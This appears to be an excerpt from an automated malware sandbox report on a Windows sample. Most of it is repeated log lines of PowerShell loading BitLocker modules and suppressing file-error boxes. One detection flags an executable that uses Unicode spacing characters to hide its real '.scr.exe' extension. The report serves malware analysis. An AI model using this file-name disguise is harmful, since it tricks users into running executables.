Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses an obfuscated file name to hide its real file extension (RTLO)

Source: initial sample

Static PE information: #U202f#U202f#U2005#U00a0.scr.exe

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE151E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF73AE151E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
